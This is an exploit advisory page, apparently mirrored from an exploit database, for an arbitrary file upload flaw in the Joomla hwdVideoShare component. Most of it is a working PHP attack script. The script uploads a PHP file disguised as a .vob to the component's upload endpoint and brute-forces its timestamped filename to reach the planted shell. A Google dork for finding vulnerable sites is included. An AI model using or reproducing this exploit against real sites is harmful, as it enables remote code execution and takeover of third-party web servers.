Joomla hwdVideoShare Shell Upload

2012.06.19
Credit: Sammy FORGIT
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:/components/com_hwdvideoshare

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Sammy FORGIT member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ################################################## # Description : Joomla Components - hwdVideoShare Arbitrary File Upload Vulnerability # Version : r805 # link : http://hwdmediashare.co.uk/hwdvideoshare # Software : http://joomlacode.org/gf/download/docmanfileversion/1389/68506/UNZIP_FIRST_hwdVideoShare_SVN-r805.zip # Date : 16-06-2012 # Google Dork : inurl:/components/com_hwdvideoshare # Site : 1337day.com Inj3ct0r Exploit Database # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr ################################################## Exploit : depends fonction date() Same country, it's ideal.Attention at the time on the target and on the pc which attack. PostShell.php <?php $uploadfile="lo.php.vob"; $ch = curl_init("http://www.exemple.com/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; echo "<br />"; $i = 0; for ($i=1;$i<9999;$i++) { $n = 4; $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT); $filename = date('YmdH').$num.$uploadfile; $url = "http://www.exemple.com/tmp/".$filename; $c = curl_init("$url"); $postResult2 = curl_exec($c); $info = curl_getinfo($c); $httpcode = $info['http_code']; if($httpcode == 200){ echo $url; curl_close($c); exit; } } ?> Shell Access : PostShell.php output lo.php.vob <?php phpinfo(); ?> # Site : 1337day.com Inj3ct0r Exploit Database

References:

http://joomlacode.org/gf/download/docmanfileversion/1389/68506/UNZIP_FIRST_hwdVideoShare_SVN-r805.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top